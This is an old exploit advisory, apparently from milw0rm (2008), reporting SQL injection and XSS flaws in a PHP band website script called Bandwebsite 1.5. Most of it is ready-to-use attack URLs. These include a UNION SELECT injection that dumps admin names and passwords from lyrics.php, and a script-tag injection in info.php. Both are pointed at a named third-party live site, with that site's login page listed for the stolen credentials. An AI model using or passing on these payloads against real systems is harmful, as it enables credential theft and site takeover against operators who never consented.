53 lines
No EOL
1.2 KiB
Text
53 lines
No EOL
1.2 KiB
Text
[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln.
|
|
[~]
|
|
[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php
|
|
[~]
|
|
[~] ----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
|
|
[~]
|
|
[~] Date: 24.11.2008
|
|
[~]
|
|
[~] Home: www.z0rlu.blogspot.com
|
|
[~]
|
|
[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos )
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) )
|
|
[~]
|
|
[~] N0T: RedHaK Kardesime ozel tesekurler.
|
|
[~] -----------------------------------------------------------
|
|
|
|
exploit:
|
|
|
|
http://localhost/script/lyrics.php?section=full&id=[SQL]
|
|
|
|
http://localhost/script/info.php?section=[XSS]
|
|
|
|
[SQL]
|
|
|
|
99999999+union+select+1,name,3,pass,5+from+admin--
|
|
|
|
|
|
example:
|
|
|
|
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
|
|
|
|
login:
|
|
|
|
http://www.caro-kunde.de/login.php
|
|
|
|
|
|
XSS:
|
|
|
|
http://www.caro-kunde.de/info.php?section="><script>alert()</script>
|
|
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & RedHaK
|
|
[~]
|
|
[~] yildirimordulari.org & darkc0de.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-11-24] |